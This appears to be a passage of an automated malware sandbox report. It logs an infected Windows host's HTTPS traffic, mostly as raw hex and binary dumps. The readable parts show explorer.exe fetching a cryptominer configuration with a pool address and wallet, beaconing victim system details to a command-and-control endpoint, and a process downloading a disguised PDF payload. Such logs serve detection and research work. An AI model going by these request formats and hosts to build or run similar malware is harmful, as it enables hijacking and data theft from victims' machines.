                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: 9b 68 96 40 61 a5 8b 17 45 19 76 99 9d 32 64 a4 b9 74 86 6f 5b bc 1a 0e a6 75 2b a9 9f 61 c2 3a 35 4c 37 59 31 8e 30 26 bf b9 03 57 ca 68 dc f4 55 0c 66 97 f7 10 c5 65 d3 81 fb 2a 33 54 30 47 2a b3 00 bc 72 0e ab 7b 82 1c 2d 58 a8 92 ab 44 4c 09 78 96 c8 4f b3 bd a3 1e c7 63 5c 05 1e 1e a4 a9 b3 98 cf b4 da 82 96 cb a5 30 de 0e e0 cf df d2 3d d2 84 2f e7 d3 f4 93 22 4f f6 e0 36 ba d9 db 88 8e 6f a3 60 60 47 5e 19 52 16 bb 52 59 ea 7a a7 85 b5 7e e7 92 9d ac e8 47 d1 16 32 5a 90 67 e8 84 00 e9 17 65 13 20 3a 1e 8a a8 7b 04 76 43 bc 01 eb 52 da c0 ef 7b ba d0 1c e1 f1 27 9c 2e 90 e7 9a ea 60 6e 4e 41 24 c3 8b 21 0b 63 81 f4 a6 4a d9 5e 3f 88 df 88 b3 2a 14 f9 60 ad 7d 8a 6c d1 0d f5 ad 99 39 bd 77 77 53 09 fb 3a f7 ea 96 3e 4d 8a ae af 2e 58 9a ae 62 27 5a
                                                                                                                                Data Ascii: h@aEv2dto[u+a:5L7Y10&WhUfe*3T0G*r{-XDLxOc\0=/"O6o``G^RRYz~G2Zge :{vCR{'.`nNA$!cJ^?*`}l9wwS:>M.Xb'Z
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: d2 96 37 19 31 73 3a cd e2 bd 6c 6f fd a8 9e b7 05 f7 d7 60 f6 d9 52 b7 4a 89 fc 3f e6 cd 11 07 68 68 59 9a f0 ce 61 a8 cf b3 9b e8 75 50 00 70 2d 21 70 b7 24 30 43 69 2b 1a d2 e0 08 7a 2a 42 54 ed 19 df 8a d9 94 68 ba 82 5e 7d 0d 08 61 0b 98 7e d3 51 a5 c1 7b 42 fe 19 4e f5 b2 54 78 c4 8f 52 ef d1 cc 0a 50 75 fc 9b 5e 52 2d 4c 7b 17 26 00 4b 25 be 3e e0 32 d4 7d 99 82 3e 9b f0 09 c8 10 b9 80 55 c4 b1 77 63 a5 e7 7b b4 b3 d8 12 86 5f b8 b5 81 49 1c ba 09 17 4c 6c 43 fa 4c 6e eb e4 87 df e6 89 d7 eb 3b dc a3 8a f8 f8 3d 4e 17 af 08 14 65 20 71 44 6f 20 d9 7a 69 a5 0d 37 87 5b 25 2b e1 14 1c d2 b2 51 44 df e5 0e 48 fc 24 7e 84 2f 47 37 0c 10 aa 6a 97 d0 30 aa a2 31 34 db 0b 18 a2 c2 97 30 80 d0 ad ea 38 90 7b 41 ef fe 4a 35 0b bf 1a fd b2 94 7b 74 d5 0a 62
                                                                                                                                Data Ascii: 71s:lo`RJ?hhYauPp-!p$0Ci+z*BTh^}a~Q{BNTxRPu^R-L{&K%>2}>Uwc{_ILlCLn;=Ne qDo zi7[%+QDH$~/G7j01408{AJ5{tb
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: 06 d2 66 25 15 75 c4 c3 5f 67 76 25 e8 20 7b 4c 61 52 63 03 da 81 14 f8 05 87 c7 00 d3 6d 12 e5 6a 62 76 c6 ad f6 a9 72 21 b3 ea 5c b2 3b de a6 e9 30 06 21 7f b0 fb 06 3a a6 e1 22 34 64 db f7 72 b2 d7 e6 1e 6d d4 c1 4f 05 d3 c9 df df 8f 6b 20 00 ec 90 1f b4 74 1a 8f 15 5e 44 be 86 55 5c 6e d5 f8 18 cf 1e 1e e8 19 43 42 c0 ad fe d2 62 26 b5 7d 5d aa 2d 59 fc 54 ba 57 7c ed 51 cc 7a 6c 9a e6 8b 4c 3b 7b 8e 73 f8 bc ac 48 71 e5 9a 13 7e 0c 16 95 80 b3 1d ad 0d e0 12 d8 6f 8c cc 9f 3b d1 dc 7b d4 3d 7a 04 2e 72 b5 c0 b2 c9 11 74 49 57 87 c8 1b 65 73 85 8b 73 4a 48 2d 88 77 75 b0 62 ce 23 6e 78 75 cc d1 86 0c 1e 23 56 f9 78 57 f1 2a c1 06 4d 82 c0 52 df 60 9b c6 86 36 3b 30 ca e4 67 1d 64 5b cc 4d 4e 1c bf fc a8 12 1c 16 da 59 7d ac 49 da 4f 7c d4 8e 78 7d b6
                                                                                                                                Data Ascii: f%u_gv% {LaRcmjbvr!\;0!:"4drmOk t^DU\nCBb&}]-YTW|QzlL;{sHq~o;{=z.rtIWessJH-wub#nxu#VxW*MR`6;0gd[MNY}IO|x}
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: 9e 16 e4 74 ff a2 04 3a e7 c0 eb b1 9b 5a 5f b6 55 a6 61 f3 7a 05 1e 09 ef 41 3f 03 84 b7 cd ce e2 59 f0 91 80 1d 45 ae cd 26 68 1d f4 c2 5f 11 7e ab 76 34 7a 5d 9b bf d6 db 0a 22 eb 72 5a e2 32 2f dd 12 af 69 16 d2 13 a8 7e 6f bd 9c f9 74 a1 cf bb c4 18 25 00 d4 18 44 ca 2f 9f c7 6e 35 44 39 78 4e fa 5e a2 d5 c2 07 a0 93 17 23 ba d6 b2 f3 59 ec 98 64 4e f8 79 83 5c e5 fe f4 69 fc 8d b0 91 be 63 46 7d 5b 92 b8 6e 01 4e 20 70 41 eb 2b e0 ca 1f ba 36 20 f7 17 1b 50 9c 79 1e 98 6c e4 00 46 f5 5f 34 f7 36 37 30 0f 88 ca 58 6d 1d 70 d0 04 bb a9 f7 11 47 4c 58 f5 33 99 9b 76 b0 cc 11 91 11 e7 ac ee ce 32 1a 16 f3 36 7a 35 67 10 7b f3 20 73 84 d1 10 b3 74 5d ba 2a c3 af 90 e4 89 cf 85 d4 65 82 25 8d 57 45 8c 6c c5 ad cc 12 b9 18 42 f3 38 ce 1b 94 70 72 44 83 4b
                                                                                                                                Data Ascii: t:Z_UazA?YE&h_~v4z]"rZ2/i~ot%D/n5D9xN^#YdNy\icF}[nN pA+6 PylF_4670XmpGLX3v26z5g{ st]*e%WElB8prDK
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: ef 48 a5 0b 34 48 ab 14 62 60 8a c2 a3 6f 3a 8f 9f b6 a5 fa 35 0e 29 a5 18 d0 d9 9f 56 e6 a8 84 42 62 08 b5 d2 6b a7 b9 63 4a 19 5e c9 9a 58 91 66 a0 a2 2c 41 55 ee 51 7f 37 d5 86 fb bd 63 d3 eb b1 5f 5c 6b bf 35 fc 1b c7 ae 3c 15 a9 71 3e 40 d0 c0 cc fd f2 05 41 d8 e8 3d 1e 0b 8b 28 2e 71 6e 9b 78 7a 3b 82 0c 52 59 c2 18 8e a4 a9 4f 52 85 5e 1b 61 e8 98 14 25 ac ca fe 97 e0 0f 45 3f 48 57 47 ec 0d 9a f4 41 7d ac bf cc 06 d2 cf d1 dd 6d 3e 12 58 2b f0 ba b9 21 6d 7d 38 d0 26 67 f8 77 ef 28 f8 0f a5 cc 95 70 60 6b 3b 7c f5 e5 af fb 40 7c e2 26 4c 21 9f b2 90 b6 95 5b f6 d1 7b a9 fa 22 47 e4 a5 8d 8a 24 15 ea 2f af f5 28 c5 f7 b6 4e 5f 4e a1 5b 27 75 f3 5a 49 61 02 0e 25 df 8a bc cf b1 d2 99 00 54 6b a9 68 44 62 96 2c 80 4f 4a ef d4 97 74 9f bc 86 5f d4 2e
                                                                                                                                Data Ascii: H4Hb`o:5)VBbkcJ^Xf,AUQ7c_\k5<q>@A=(.qnxz;RYOR^a%E?HWGA}m>X+!m}8&gw(p`k;|@|&L![{"G$/(N_N['uZIa%TkhDb,OJt_.
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: 2d 1d eb f8 0d 7d ce 2f 94 3f f2 35 3a b9 21 31 7b 87 c9 16 f4 be 48 f8 e3 86 aa a0 56 29 04 7a d6 29 0b 1c 03 3e 2a 16 cb 03 dc fe ff 09 74 2d 1c 67 62 25 9a ee e8 1e f9 96 49 19 7c 7b 18 b9 4f 06 75 78 45 22 03 5a 6b e3 47 5e a1 63 3e 33 37 9e 71 92 e8 71 e0 4e 9f 26 62 9c 07 8d 4a 17 ff 96 46 bc b7 ba 8a 12 18 fb b6 a9 8c 8f 30 00 cf c3 ca 22 76 ed 10 7c 75 0a f8 77 f7 c5 85 44 b0 94 22 82 16 33 a4 13 9c e3 dd 99 67 41 0c 32 d9 7b 3b a3 b1 51 e6 74 be dd 05 37 d6 49 99 57 f6 9a 3c 8d 40 57 e9 cd 56 7f a7 50 71 ce b9 d5 b4 c9 3e 41 0c 97 46 ae 4a d3 9c 22 ac 69 2e e5 47 2d 56 21 89 e6 b2 a3 0c c5 e0 69 13 c8 63 77 1a 76 0f ee a7 67 16 28 9b 77 91 f9 c6 84 5a fb ff 4b ed 78 5b 0a 27 a3 ac a9 a7 50 8d eb 9d 40 82 89 23 84 d3 62 d4 a6 ca bf 44 e8 48 d6 71
                                                                                                                                Data Ascii: -}/?5:!1{HV)z)>*t-gb%I|{OuxE"ZkG^c>37qqN&bJF0"v|uwD"3gA2{;Qt7IW<@WVPq>AFJ"i.G-V!icwvg(wZKx['P@#bDHq
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: d4 58 34 7d 27 78 c5 1d 63 d9 c5 2d 01 91 5e 81 d9 d9 94 e2 d9 72 e5 ff 0f a7 f0 25 1b ea 14 0c 13 26 40 fe a2 cb f2 83 50 c6 9e 87 a7 01 8d 10 11 b1 25 24 34 39 cc eb 0c 73 ef cc b5 7e 0b 31 c6 98 db e9 87 6d 13 c1 26 65 22 1f 79 84 4a 27 11 a9 61 c6 9a 20 d7 3a da 16 df e5 55 cf 00 9f a6 29 28 09 3e c1 eb f9 ad 62 0b 47 69 a0 7e 65 60 02 f8 3c ea 4e b2 95 82 92 c8 1c c8 27 82 3d 29 29 df c1 58 83 29 33 c2 b4 73 cf 16 b0 2c 1e 19 70 64 de 36 d1 de f2 6a 96 ed dd ce a9 64 3f b2 ca 5d 21 e4 f9 9c c4 50 45 94 04 ee 6e 4f c9 d8 4a 99 c5 96 b5 89 ab c0 eb 66 90 94 7d 2b 70 b0 2d ad 8b e2 b5 bc d0 ea 86 db 33 56 c6 cb af f3 f0 69 a7 27 59 87 1b f5 13 5b 5d 71 9c a4 8d 01 82 56 0f fa 88 db 1e e4 0e b3 70 15 d5 f6 d9 76 1e 1a 31 c1 cb 17 67 89 91 cc ea e7 f2 7e
                                                                                                                                Data Ascii: X4}'xc-^r%&@P%$49s~1m&e"yJ'a :U)(>bGi~e`<N'=))X)3s,pd6jd?]!PEnOJf}+p-3Vi'Y[]qVpv1g~
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: 09 59 63 b0 49 85 74 1f d0 0b 7f 5a b1 5a 4b a9 28 5f da e5 c1 b1 17 ca 66 33 f4 30 fd 1c d3 0d 6c fb 75 0c 21 27 eb 95 68 cc 61 64 ec 87 b7 5d bd 2f cb ce 42 12 6b 01 be e2 f0 b4 e4 30 a7 b5 2f a0 50 30 2e e0 d8 85 20 45 a5 c9 ae 67 c4 7f af 61 13 c8 c6 01 c8 18 25 5e cf 7b d4 a0 2c 3e e3 c5 85 44 b6 58 9e 0c a2 e5 1e 9d b9 97 ba fc 60 4f fd 8b c2 d7 26 13 e1 05 59 59 40 05 d8 e1 7a 5f d7 a4 02 39 6f 65 86 94 64 1a 32 97 e3 c9 24 14 15 8a e6 53 fa bb 97 e5 50 85 b7 02 4f 7a 47 be 3d e1 3e 03 07 78 79 1a 5f 90 72 ae 90 b5 c7 d5 fd f4 44 0e 9a 51 4d aa c2 cb 9f 8c a0 74 c9 99 1b 1f d9 bf e1 9b 32 1c d3 16 e8 64 1e 6b 9c 16 a8 cf fc 3b 16 d7 c5 b6 14 8a d9 03 0e 6d d8 48 d1 ee 24 50 2f 32 0f 5d 0a 01 95 66 a5 53 85 7e d9 af 7a 00 83 94 02 e5 02 fb 47 e6 0e
                                                                                                                                Data Ascii: YcItZZK(_f30lu!'had]/Bk0/P0. Ega%^{,>DX`O&YY@z_9oed2$SPOzG=>xy_rDQMt2dk;mH$P/2]fS~zG
                                                                                                                                2024-12-16 12:41:01 UTC16384INData Raw: 9c 8d 7a 6b b8 9f 99 eb d5 91 c0 c6 da 5e 51 85 93 57 34 91 c8 f7 ec 1e 86 4b 9d 97 3d 79 e6 de 7d 42 b0 3f 4c 86 c1 29 5e b0 1e 9f 2a b1 b1 06 c6 18 3b d9 5a fd 77 84 21 c8 3c ce b1 7d a9 d2 04 89 c3 3d 56 0c 08 cf ff e2 e7 23 93 22 58 e6 1c 95 56 77 5b ee 3b 26 07 28 59 94 49 53 f4 1f 4d 4d e7 1f 19 81 8a 98 09 10 ac b7 6d dd 87 bb 93 a4 f3 ad 05 2a ec 8b 1e 13 31 ff 86 fb aa d2 df 34 ac cb 25 2d e5 ba 7d 6f d5 6e 97 43 45 c0 fe 2b 4c 85 dc bf 7d 54 5e 12 74 d6 ab 5e 8b b8 b9 74 8b 17 5d a5 73 ba 0c 32 8f 51 36 4f 20 d4 db 8f be 77 24 02 da 39 04 33 76 ec e0 c7 88 77 4e 1f 63 3f 82 8e 24 39 02 32 ad 18 eb 9a 87 40 c4 aa 26 b4 b4 d4 00 ea bb b9 0e 35 5a cb 23 cb 1a eb 7e 3a 38 1f 9d fb 14 a1 e3 40 88 d7 a4 d7 5f 6e 0c 9f ba 2b 54 e4 80 be 0b be b2 04 0e
                                                                                                                                Data Ascii: zk^QW4K=y}B?L)^*;Zw!<}=V#"XVw[;&(YISMMm*14%-}onCE+L}T^t^t]s2Q6O w$93vwNc?$92@&5Z#~:8@_n+T


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.749722154.216.20.2434432868C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 12:41:19 UTC111OUTGET /P.txt HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Connection: close
                                                                                                                                Host: woo097878781.win
                                                                                                                                User-Agent: cpp-httplib/0.12.6
                                                                                                                                2024-12-16 12:41:20 UTC252INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 16 Dec 2024 12:41:19 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 1034
                                                                                                                                Last-Modified: Sat, 14 Dec 2024 11:58:20 GMT
                                                                                                                                Connection: close
                                                                                                                                ETag: "675d72dc-40a"
                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                2024-12-16 12:41:20 UTC1034INData Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 20
                                                                                                                                Data Ascii: { "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": true,


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.749728154.216.20.2434432868C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 12:41:21 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 336
                                                                                                                                Content-Type: application/json
                                                                                                                                Host: woo097878781.win
                                                                                                                                User-Agent: cpp-httplib/0.12.6
                                                                                                                                2024-12-16 12:41:21 UTC336OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 33 32 39 32 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 33 32 39 32 33 22 2c 22 67 70 75 22 3a 22 54 32 35 44 44 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                2024-12-16 12:41:22 UTC264INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 16 Dec 2024 12:41:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                X-Powered-By: PHP/8.3.14
                                                                                                                                X-Robots-Tag: noindex, nofollow
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                2024-12-16 12:41:22 UTC28INData Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 11{"response":"ok"}0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.749750154.216.20.2434437324C:\Users\user\AppData\Roaming\IsStopped.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 12:41:30 UTC91OUTGET /77/uploads/Odavmyskfc.pdf HTTP/1.1
                                                                                                                                Host: woo097878781.win
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 12:41:31 UTC263INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 16 Dec 2024 12:41:31 GMT
                                                                                                                                Content-Type: application/pdf
                                                                                                                                Content-Length: 5665288
                                                                                                                                Last-Modified: Sun, 15 Dec 2024 21:16:41 GMT
                                                                                                                                Connection: close
                                                                                                                                ETag: "675f4739-567208"
                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                2024-12-16 12:41:31 UTC16121INData Raw: c0 f6 84 76 95 87 34 aa e4 e7 46 51 9b 21 60 24 53 46 5d 3f 89 b2 9d 4e e6 09 b9 a7 d7 a1 15 c7 5d 0e b9 15 2f c4 41 4c bc 9f 68 8e eb 7d 40 9b 2a 6f 0b 1c d5 65 33 ec c9 7e 9b 00 6f 85 8f c7 1d 49 92 b6 5b 9b 30 41 f1 a5 2d 6e 8b a3 ab fe 91 aa 41 ac 17 c4 91 be e0 5b b5 19 e3 49 96 e3 fa 50 06 b6 0e 5a 33 c2 d9 aa cc a1 11 44 41 1e bb dd 89 00 cd 85 02 df b3 ce 80 1a d5 43 57 10 a7 da 9f 99 34 77 73 ec 5c 91 5c 64 0e b4 4c c4 3c 57 43 95 ab a4 f7 2c 1a 42 94 54 72 be 37 08 d2 4b 0d 06 d9 16 a9 ca 3f 67 db cd ae 98 e8 bc 10 71 60 7c 42 c8 33 00 e5 80 b9 b3 d9 9b ea 16 5c 9d 38 8b 6e 9d cb e2 77 33 52 f4 8c 09 d8 7c 7c fa d0 27 2a 16 e8 b6 c3 11 23 e5 be 2a c3 fb 2a c9 33 67 d6 91 b8 63 88 22 49 aa c2 41 43 e7 05 af 68 69 05 9b 54 09 6f 92 66 b7 fa 7f 05
                                                                                                                                Data Ascii: v4FQ!`$SF]?N]/ALh}@*oe3~oI[0A-nA[IPZ3DACW4ws\\dL<WC,BTr7K?gq`|B3\8nw3R||'*#**3gc"IAChiTof
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: 9b 68 96 40 61 a5 8b 17 45 19 76 99 9d 32 64 a4 b9 74 86 6f 5b bc 1a 0e a6 75 2b a9 9f 61 c2 3a 35 4c 37 59 31 8e 30 26 bf b9 03 57 ca 68 dc f4 55 0c 66 97 f7 10 c5 65 d3 81 fb 2a 33 54 30 47 2a b3 00 bc 72 0e ab 7b 82 1c 2d 58 a8 92 ab 44 4c 09 78 96 c8 4f b3 bd a3 1e c7 63 5c 05 1e 1e a4 a9 b3 98 cf b4 da 82 96 cb a5 30 de 0e e0 cf df d2 3d d2 84 2f e7 d3 f4 93 22 4f f6 e0 36 ba d9 db 88 8e 6f a3 60 60 47 5e 19 52 16 bb 52 59 ea 7a a7 85 b5 7e e7 92 9d ac e8 47 d1 16 32 5a 90 67 e8 84 00 e9 17 65 13 20 3a 1e 8a a8 7b 04 76 43 bc 01 eb 52 da c0 ef 7b ba d0 1c e1 f1 27 9c 2e 90 e7 9a ea 60 6e 4e 41 24 c3 8b 21 0b 63 81 f4 a6 4a d9 5e 3f 88 df 88 b3 2a 14 f9 60 ad 7d 8a 6c d1 0d f5 ad 99 39 bd 77 77 53 09 fb 3a f7 ea 96 3e 4d 8a ae af 2e 58 9a ae 62 27 5a
                                                                                                                                Data Ascii: h@aEv2dto[u+a:5L7Y10&WhUfe*3T0G*r{-XDLxOc\0=/"O6o``G^RRYz~G2Zge :{vCR{'.`nNA$!cJ^?*`}l9wwS:>M.Xb'Z
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: d2 96 37 19 31 73 3a cd e2 bd 6c 6f fd a8 9e b7 05 f7 d7 60 f6 d9 52 b7 4a 89 fc 3f e6 cd 11 07 68 68 59 9a f0 ce 61 a8 cf b3 9b e8 75 50 00 70 2d 21 70 b7 24 30 43 69 2b 1a d2 e0 08 7a 2a 42 54 ed 19 df 8a d9 94 68 ba 82 5e 7d 0d 08 61 0b 98 7e d3 51 a5 c1 7b 42 fe 19 4e f5 b2 54 78 c4 8f 52 ef d1 cc 0a 50 75 fc 9b 5e 52 2d 4c 7b 17 26 00 4b 25 be 3e e0 32 d4 7d 99 82 3e 9b f0 09 c8 10 b9 80 55 c4 b1 77 63 a5 e7 7b b4 b3 d8 12 86 5f b8 b5 81 49 1c ba 09 17 4c 6c 43 fa 4c 6e eb e4 87 df e6 89 d7 eb 3b dc a3 8a f8 f8 3d 4e 17 af 08 14 65 20 71 44 6f 20 d9 7a 69 a5 0d 37 87 5b 25 2b e1 14 1c d2 b2 51 44 df e5 0e 48 fc 24 7e 84 2f 47 37 0c 10 aa 6a 97 d0 30 aa a2 31 34 db 0b 18 a2 c2 97 30 80 d0 ad ea 38 90 7b 41 ef fe 4a 35 0b bf 1a fd b2 94 7b 74 d5 0a 62
                                                                                                                                Data Ascii: 71s:lo`RJ?hhYauPp-!p$0Ci+z*BTh^}a~Q{BNTxRPu^R-L{&K%>2}>Uwc{_ILlCLn;=Ne qDo zi7[%+QDH$~/G7j01408{AJ5{tb
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: 06 d2 66 25 15 75 c4 c3 5f 67 76 25 e8 20 7b 4c 61 52 63 03 da 81 14 f8 05 87 c7 00 d3 6d 12 e5 6a 62 76 c6 ad f6 a9 72 21 b3 ea 5c b2 3b de a6 e9 30 06 21 7f b0 fb 06 3a a6 e1 22 34 64 db f7 72 b2 d7 e6 1e 6d d4 c1 4f 05 d3 c9 df df 8f 6b 20 00 ec 90 1f b4 74 1a 8f 15 5e 44 be 86 55 5c 6e d5 f8 18 cf 1e 1e e8 19 43 42 c0 ad fe d2 62 26 b5 7d 5d aa 2d 59 fc 54 ba 57 7c ed 51 cc 7a 6c 9a e6 8b 4c 3b 7b 8e 73 f8 bc ac 48 71 e5 9a 13 7e 0c 16 95 80 b3 1d ad 0d e0 12 d8 6f 8c cc 9f 3b d1 dc 7b d4 3d 7a 04 2e 72 b5 c0 b2 c9 11 74 49 57 87 c8 1b 65 73 85 8b 73 4a 48 2d 88 77 75 b0 62 ce 23 6e 78 75 cc d1 86 0c 1e 23 56 f9 78 57 f1 2a c1 06 4d 82 c0 52 df 60 9b c6 86 36 3b 30 ca e4 67 1d 64 5b cc 4d 4e 1c bf fc a8 12 1c 16 da 59 7d ac 49 da 4f 7c d4 8e 78 7d b6
                                                                                                                                Data Ascii: f%u_gv% {LaRcmjbvr!\;0!:"4drmOk t^DU\nCBb&}]-YTW|QzlL;{sHq~o;{=z.rtIWessJH-wub#nxu#VxW*MR`6;0gd[MNY}IO|x}
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: 9e 16 e4 74 ff a2 04 3a e7 c0 eb b1 9b 5a 5f b6 55 a6 61 f3 7a 05 1e 09 ef 41 3f 03 84 b7 cd ce e2 59 f0 91 80 1d 45 ae cd 26 68 1d f4 c2 5f 11 7e ab 76 34 7a 5d 9b bf d6 db 0a 22 eb 72 5a e2 32 2f dd 12 af 69 16 d2 13 a8 7e 6f bd 9c f9 74 a1 cf bb c4 18 25 00 d4 18 44 ca 2f 9f c7 6e 35 44 39 78 4e fa 5e a2 d5 c2 07 a0 93 17 23 ba d6 b2 f3 59 ec 98 64 4e f8 79 83 5c e5 fe f4 69 fc 8d b0 91 be 63 46 7d 5b 92 b8 6e 01 4e 20 70 41 eb 2b e0 ca 1f ba 36 20 f7 17 1b 50 9c 79 1e 98 6c e4 00 46 f5 5f 34 f7 36 37 30 0f 88 ca 58 6d 1d 70 d0 04 bb a9 f7 11 47 4c 58 f5 33 99 9b 76 b0 cc 11 91 11 e7 ac ee ce 32 1a 16 f3 36 7a 35 67 10 7b f3 20 73 84 d1 10 b3 74 5d ba 2a c3 af 90 e4 89 cf 85 d4 65 82 25 8d 57 45 8c 6c c5 ad cc 12 b9 18 42 f3 38 ce 1b 94 70 72 44 83 4b
                                                                                                                                Data Ascii: t:Z_UazA?YE&h_~v4z]"rZ2/i~ot%D/n5D9xN^#YdNy\icF}[nN pA+6 PylF_4670XmpGLX3v26z5g{ st]*e%WElB8prDK
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: ef 48 a5 0b 34 48 ab 14 62 60 8a c2 a3 6f 3a 8f 9f b6 a5 fa 35 0e 29 a5 18 d0 d9 9f 56 e6 a8 84 42 62 08 b5 d2 6b a7 b9 63 4a 19 5e c9 9a 58 91 66 a0 a2 2c 41 55 ee 51 7f 37 d5 86 fb bd 63 d3 eb b1 5f 5c 6b bf 35 fc 1b c7 ae 3c 15 a9 71 3e 40 d0 c0 cc fd f2 05 41 d8 e8 3d 1e 0b 8b 28 2e 71 6e 9b 78 7a 3b 82 0c 52 59 c2 18 8e a4 a9 4f 52 85 5e 1b 61 e8 98 14 25 ac ca fe 97 e0 0f 45 3f 48 57 47 ec 0d 9a f4 41 7d ac bf cc 06 d2 cf d1 dd 6d 3e 12 58 2b f0 ba b9 21 6d 7d 38 d0 26 67 f8 77 ef 28 f8 0f a5 cc 95 70 60 6b 3b 7c f5 e5 af fb 40 7c e2 26 4c 21 9f b2 90 b6 95 5b f6 d1 7b a9 fa 22 47 e4 a5 8d 8a 24 15 ea 2f af f5 28 c5 f7 b6 4e 5f 4e a1 5b 27 75 f3 5a 49 61 02 0e 25 df 8a bc cf b1 d2 99 00 54 6b a9 68 44 62 96 2c 80 4f 4a ef d4 97 74 9f bc 86 5f d4 2e
                                                                                                                                Data Ascii: H4Hb`o:5)VBbkcJ^Xf,AUQ7c_\k5<q>@A=(.qnxz;RYOR^a%E?HWGA}m>X+!m}8&gw(p`k;|@|&L![{"G$/(N_N['uZIa%TkhDb,OJt_.
